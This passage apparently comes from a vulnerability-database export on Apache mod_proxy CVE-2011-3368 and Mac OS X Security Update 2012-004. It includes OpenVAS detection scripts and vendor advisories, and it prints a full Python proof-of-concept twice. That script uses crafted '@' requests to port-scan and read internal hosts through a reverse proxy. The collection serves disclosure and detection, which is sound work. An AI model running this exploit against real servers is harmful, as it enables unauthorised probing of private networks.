DirectoryService\n ImageIO\n Installer\n International Components for Unicode\n Kernel\n LoginWindow\n Mail\n Mobile Accounts\n PHP\n Profile Manager\n QuickLook\n QuickTime\n Ruby\n USB\";\ntag_insight = \"For more information on the vulnerabilities refer to the links below.\";\ntag_solution = \"Run Mac Updates and update the Security Update 2012-004,\n For updates refer to http://support.apple.com/kb/DL1586\";\ntag_summary = \"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.\";\n\nif(description)\n{\n script_id(802968);\n 
script_version(\"$Revision: 6521 $\");\n script_cve_id(\"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0650\",\n \"CVE-2012-1173\", \"CVE-2012-3719\", \"CVE-2012-0831\", \"CVE-2012-1172\",\n \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2311\", \"CVE-2012-2386\",\n \"CVE-2012-2688\", \"CVE-2012-0671\", \"CVE-2012-0670\", \"CVE-2012-3722\",\n \"CVE-2012-0668\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\",\n \"CVE-2011-3026\", \"CVE-2011-3048\", \"CVE-2011-4599\", \"CVE-2011-3048\",\n \"CVE-2011-3389\");\n script_bugtraq_id(51705, 51407, 51706, 55623, 52891, 55623, 51954, 53403, 49778,\n 53388, 53729, 47545, 54638, 53584, 53582, 55612, 49957, 50494,\n 50802, 52049, 52830, 51006, 52830);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 16:51:10 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-25 19:33:16 +0530 (Tue, 25 Sep 2012)\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT5501\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/DL1586\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/50628/\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html\");\n\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\n## Variable Initialization\nosName = \"\";\nosVer = \"\";\n\n## Get the OS name\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName){\n exit (0);\n}\n\n## Get the OS Version\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer){\n exit(0);\n}\n\n## Check for the Mac OS X and Mac OS X Server\nif(\"Mac OS X\" >< osName)\n{\n ## Check the affected OS versions\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n ## Check for the security update 2012.004\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2012.004\")){\n security_message(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-26T15:08:45", "description": "This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.", "cvss3": {}, "published": "2012-09-25T00:00:00", "type": "openvas", "title": "Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3722", "CVE-2011-4317", "CVE-2012-2311", "CVE-2011-3026", "CVE-2012-2386", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-4599", "CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2688", "CVE-2011-3389", "CVE-2012-0053", "CVE-2012-0021", "CVE-2012-3720", "CVE-2011-3368", "CVE-2012-0670", "CVE-2012-3718", "CVE-2012-1667", "CVE-2012-0650", "CVE-2012-1172", "CVE-2011-3048", "CVE-2012-0671", "CVE-2012-1173", "CVE-2012-0831", "CVE-2012-0668", "CVE-2012-3719"], "modified": "2020-04-22T00:00:00", "id": "OPENVAS:1361412562310802968", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802968", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802968\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2012-0650\",\n \"CVE-2012-1173\", \"CVE-2012-3719\", \"CVE-2012-0831\", \"CVE-2012-1172\",\n \"CVE-2012-1823\", \"CVE-2012-2143\", \"CVE-2012-2311\", \"CVE-2012-2386\",\n \"CVE-2012-2688\", \"CVE-2012-0671\", \"CVE-2012-0670\", \"CVE-2012-3722\",\n \"CVE-2012-0668\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\",\n \"CVE-2011-3026\", \"CVE-2011-3048\", \"CVE-2011-4599\", \"CVE-2011-3389\",\n \"CVE-2012-1667\", \"CVE-2012-3718\", \"CVE-2012-3720\");\n script_bugtraq_id(51705, 51407, 51706, 55623, 52891, 55623, 51954, 53403, 49778,\n 53388, 53729, 47545, 54638, 53584, 53582, 55612, 49957, 50494,\n 50802, 52049, 52830, 51006, 52830);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-09-25 19:33:16 +0530 (Tue, 25 Sep 2012)\");\n script_name(\"Mac OS X v10.6.8 Multiple Vulnerabilities (2012-004)\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT5501\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/DL1586\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/50628/\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html\");\n\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.6\\.8\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to cause a buffer overflow,\n disclose potentially sensitive information or cause a DoS.\");\n script_tag(name:\"affected\", value:\"Apache\n BIND\n CoreText\n Data Security\n DirectoryService\n ImageIO\n Installer\n International Components for Unicode\n Kernel\n LoginWindow\n Mail\n Mobile Accounts\n PHP\n Profile Manager\n QuickLook\n QuickTime\n Ruby\n USB\");\n script_tag(name:\"insight\", value:\"Please see the references for more information on the vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Run Mac Updates and update the Security Update 2012-004.\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Mac OS X 10.6.8 Update/Mac OS X Security Update 2012-004.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"pkg-lib-macosx.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_is_equal(version:osVer, test_version:\"10.6.8\"))\n {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2012.004\")){\n report = report_fixed_ver(installed_version:osVer, vulnerable_range:\"Equal to 10.6.8\");\n security_message(port:0, data:report);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_proxy - Reverse Proxy Exposure", "edition": 2, "cvss3": {}, "published": "2011-10-11T00:00:00", "title": "Apache mod_proxy - Reverse Proxy Exposure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B", "href": "", "sourceData": "#!/usr/bin/env python\n\nimport socket\nimport string\nimport getopt, sys\n\n\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\n\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\n\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\n\t\n\tremoteserver = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tremoteserver.settimeout(3)\n\n\ttry:\n\t\tremoteserver.connect((apache_target, int(apache_port)))\n\t\tremoteserver.send(get)\n\t\treturn remoteserver.recv(4096)\n\texcept:\n\t\treturn \"\"\n\ndef get_banner(result):\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\n\n\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\n\tfor port in tested_ports:\n\t\tport = str(port)\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\n\t\t\tprint get_banner(result)\n\t\telif len(result)==0:\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\n\t\telse:\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\n\t\t\t\n\ndef usage():\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \"usage():\"\n\tprint \"python apache_scan.py [options]\"\n\tprint\n\tprint \" [options]\"\n\tprint \"\t\t-r: Remote Apache host\"\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\n\tprint \"\t\t-h: Help page\"\n\tprint\n\tprint \"examples:\"\n\tprint \" - Port scan of the remote host\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\n\tprint \" - Port scan of a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\n\tprint \" - Retrieve a 
resource from a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\n\tprint\n\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \" [+] Target: \" + apache_target\n\tprint \" [+] Target port: \" + apache_port\n\tprint \" [+] Internal host: \" + internal_target\n\tprint \" [+] Tested ports: \" + str(tested_ports)\n\tprint \" [+] Internal resource: \" + resource\n\tprint\n\n\ndef main():\n\n\tglobal apache_target\n\tglobal apache_port\n\tglobal url\n\tglobal internal_target\n\tglobal internal_port\n\tglobal resource\n\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\n\ttry:\n\t\tfor o, a in opts:\n\t\t\tif o in (\"-h\", \"--help\"):\n\t\t\t\tusage()\n\t\t\t\tsys.exit(2)\n\t\t\tif o == \"-u\":\n\t\t\t\turl=a\n\t\t\tif o == \"-r\":\n\t\t\t\tapache_target=a\n\t\t\tif o == \"-p\":\n\t\t\t\tapache_port=a\n\t\t\tif o == \"-d\":\n\t\t\t\tinternal_target = a\n\t\t\tif o == \"-e\":\n\t\t\t\tinternal_port=a\n\t\t\tif o == \"-g\":\n\t\t\t\tresource=a\t\t\t\t\n\t\t\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\t\t\n\tif apache_target == \"\":\n\t\tusage()\n\t\tsys.exit(2)\n\n\nurl = \"/\"\napache_target = \"\"\napache_port = \"80\"\ninternal_target = \"127.0.0.1\"\ninternal_port = \"\"\nresource = \"/\"\n\nmain()\n\nif internal_port!=\"\":\n\ttested_ports = [internal_port]\nelse:\n\ttested_ports = known_ports\n\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T17:59:00", "description": "Bugtraq ID: 49957\r\nCVE ID\uff1aCVE-2011-3368\r\n\r\nApache HTTP 
Server is an open-source HTTPD server program.\r\nThe Apache HTTP Server mod_proxy module has a security vulnerability that allows malicious users to bypass certain security restrictions.\r\nThe vulnerability applies when the mod_proxy module is configured in reverse proxy mode: because some web requests are handled incorrectly, an attacker who constructs a specially crafted URL can send malicious requests to unintended servers behind the proxy.\r\nSuccessful exploitation requires "ProxyPassMatch" and "RewriteRule" configuration directives that use certain pattern matches.\n\nApache 2.0.x\r\nApache 2.2.x\nVendor solution\r\nUsers can refer to the following security patch provided by the vendor:\r\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/CVE-2011-3368.patch", "cvss3": {}, "published": "2011-10-08T00:00:00", "title": "Apache HTTP Server 'mod_proxy' reverse proxy information disclosure vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20979", "id": "SSV:20979", "sourceData": "\n A configuration like the following:\r\nRewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\nProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\ncan expose internal server information. A request of the following form:\r\n GET @other.example.com/something.png HTTP/1.1\r\n \r\nis translated into the following target request:\r\nhttp://images.example.com@other.example.
com/something.png\r\nThis causes the proxy to connect to "other.example.com", because the "images.example.com@" segment is treated as user credentials when the URL is parsed.\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20979", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:58:49", "description": "No description provided by source.", "cvss3": {}, "published": "2011-10-12T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20993", "id": "SSV:20993", "sourceData": "\n #!/usr/bin/env python\r\n \r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n \r\n \r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n \r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n \r\n get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\\r\\n"\r\n get = get + "Host: " + apache_target + "\\r\\n\\r\\n"\r\n \r\n remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n remoteserver.settimeout(3)\r\n \r\n try:\r\n remoteserver.connect((apache_target, int(apache_port)))\r\n remoteserver.send(get)\r\n return remoteserver.recv(4096)\r\n except:\r\n return ""\r\n \r\ndef get_banner(result):\r\n return result[string.find(result, "\\r\\n\\r\\n")+4:]\r\n \r\n \r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n \r\n print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n for port in tested_ports:\r\n port = str(port)\r\n result = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n if string.find(result,"HTTP/1.1 
200")!=-1 or \\\r\n string.find(result,"HTTP/1.1 30")!=-1 or \\\r\n string.find(result,"HTTP/1.1 502")!=-1:\r\n print "- Open port: " + port + "/TCP"\r\n print get_banner(result)\r\n elif len(result)==0:\r\n print "- Filtered port: " + port + "/TCP"\r\n else:\r\n print "- Closed port: " + port + "/TCP"\r\n \r\n \r\ndef usage():\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print "usage():"\r\n print "python apache_scan.py [options]"\r\n print\r\n print " [options]"\r\n print " -r: Remote Apache host"\r\n print " -p: Remote Apache port (default is 80)"\r\n print " -u: URL on the remote web server (default is /)"\r\n print " -d: Host in the DMZ (default is 127.0.0.1)"\r\n print " -e: Port in the DMZ (enables 'single port scan')"\r\n print " -g: GET request to the host in the DMZ (default is /)"\r\n print " -h: Help page"\r\n print\r\n print "examples:"\r\n print " - Port scan of the remote host"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif"\r\n print " - Port scan of a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"\r\n print " - Retrieve a resource from a host in the DMZ"\r\n print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"\r\n print\r\n \r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n print\r\n print "CVE-2011-3368 proof of concept by Rodrigo Marcos"\r\n print "http://www.secforce.co.uk"\r\n print\r\n print " [+] Target: " + apache_target\r\n print " [+] Target port: " + apache_port\r\n print " [+] Internal host: " + internal_target\r\n print " [+] Tested ports: " + str(tested_ports)\r\n print " [+] Internal resource: " + resource\r\n print\r\n \r\n \r\ndef main():\r\n \r\n global apache_target\r\n global apache_port\r\n global url\r\n global internal_target\r\n global 
internal_port\r\n global resource\r\n \r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])\r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n try:\r\n for o, a in opts:\r\n if o in ("-h", "--help"):\r\n usage()\r\n sys.exit(2)\r\n if o == "-u":\r\n url=a\r\n if o == "-r":\r\n apache_target=a\r\n if o == "-p":\r\n apache_port=a\r\n if o == "-d":\r\n internal_target = a\r\n if o == "-e":\r\n internal_port=a\r\n if o == "-g":\r\n resource=a \r\n \r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n if apache_target == "":\r\n usage()\r\n sys.exit(2)\r\n \r\n \r\nurl = "/"\r\napache_target = ""\r\napache_port = "80"\r\ninternal_target = "127.0.0.1"\r\ninternal_port = ""\r\nresource = "/"\r\n \r\nmain()\r\n \r\nif internal_port!="":\r\n tested_ports = [internal_port]\r\nelse:\r\n tested_ports = known_ports\r\n \r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20993", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:59:00", "description": "No description provided by source.", "cvss3": {}, "published": "2011-10-06T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20969", "id": "SSV:20969", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nApache HTTP Server Security Advisory\r\n====================================\r\n\r\nTitle: mod_proxy reverse proxy exposure\r\n\r\nCVE: CVE-2011-3368\r\nDate: 20111005\r\nProduct: Apache HTTP Server\r\nVersions: httpd 1.3 all versions, httpd 2.x all versions\r\n\r\nDescription:\r\n============\r\n\r\nAn exposure was reported affecting the use of Apache HTTP Server in\r\nreverse proxy mode. 
We would like to thank Context Information\r\nSecurity Ltd for reporting this issue to us.\r\n\r\nWhen using the RewriteRule or ProxyPassMatch directives to configure a\r\nreverse proxy using a pattern match, it is possible to inadvertently\r\nexpose internal servers to remote users who send carefully crafted\r\nrequests. The server did not validate that the input to the pattern\r\nmatch was a valid path string, so a pattern could expand to an\r\nunintended target URL.\r\n\r\nFor future releases of the Apache HTTP Server, the software will\r\nvalidate the request URI, correcting this specific vulnerability. The\r\ndocumentation has been updated to reflect the more general risks with\r\npattern matching in a reverse proxy configuration.\r\n\r\nDetails:\r\n========\r\n\r\nA configuration like one of the following examples:\r\n\r\n RewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\n ProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\r\ncould result in an exposure of internal servers. A request of the form:\r\n\r\n GET @other.example.com/something.png HTTP/1.1\r\n\r\nwould get translated to a target of:\r\n\r\n http://images.example.com@other.example.com/something.png\r\n\r\nThis will cause the proxy to connect to the hostname\r\n"other.example.com", as the "images.example.com@" segment would be\r\ntreated as user credentials when parsing the URL. This would allow a\r\nremote attacker the ability to proxy to hosts other than those\r\nexpected, which could be a security exposure in some circumstances.\r\n\r\nThe request-URI string in this example,\r\n"@other.example.com/something.png", is not valid according to the HTTP\r\nspecification, since it neither an absolute URI\r\n("http://example.com/path") nor an absolute path ("/path"). 
For\r\nfuture releases, the server has been patched to reject such requests,\r\ninstead returning a "400 Bad Request" error.\r\n\r\nActions:\r\n========\r\n\r\nApache HTTPD users should examine their configuration files to determine \r\nif they have used an insecure configuration for reverse proxying. \r\nAffected users can update their configuration, or apply the patch from:\r\n\r\n http://www.apache.org/dist/httpd/patches/apply_to_2.2.21/\r\n\r\nFor example, the above RewriteRule could be changed to:\r\n\r\n RewriteRule /(.*)\\.(jpg|gif|png) http://images.example.com/$1.$2 [P]\r\n\r\nto ensure the pattern only matches against paths with a leading "/".\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6MZZAACgkQR/aWnQ5EzwxdfQCg0yX+OplatMPQcweRneRmh5Xp\r\n5sEAoLooi9H4LW12oPgStNbY2wtyQrYP\r\n=8qjg\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20969", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "httpd": [{"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. 
No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.0.65 : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2013-07-22T00:00:00", "id": "HTTPD:957760910D8CC358871C30AD5A1D2A5F", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. 
No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 1.3-never : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2011-09-16T00:00:00", "id": "HTTPD:251E9EE30116844024950699040C983B", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T15:48:19", "description": "An exposure was found when using mod_proxy in reverse proxy mode. In certain configurations using RewriteRule with proxy flag or ProxyPassMatch, a remote attacker could cause the reverse proxy to connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to attacker. 
No update of 1.3 will be released.\nPatches will be published to https://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/", "cvss3": {}, "published": "2011-09-16T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.2.22 : mod_proxy reverse proxy exposure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2012-01-31T00:00:00", "id": "HTTPD:1DC50F4C723B9143E9713B27031C6043", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:56:15", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x\nthrough 2.0.64, and 2.2.x through 2.2.21 does not properly interact with\nuse of (1) RewriteRule and (2) ProxyPassMatch pattern matches for\nconfiguration of a reverse proxy, which allows remote attackers to send\nrequests to intranet servers via a malformed URI containing an initial @\n(at sign) character.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3368>\n * <https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/877740>\n * <https://bugzilla.novell.com/show_bug.cgi?id=722545>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | Per Novell BTS (comment #16), the proposed fix is 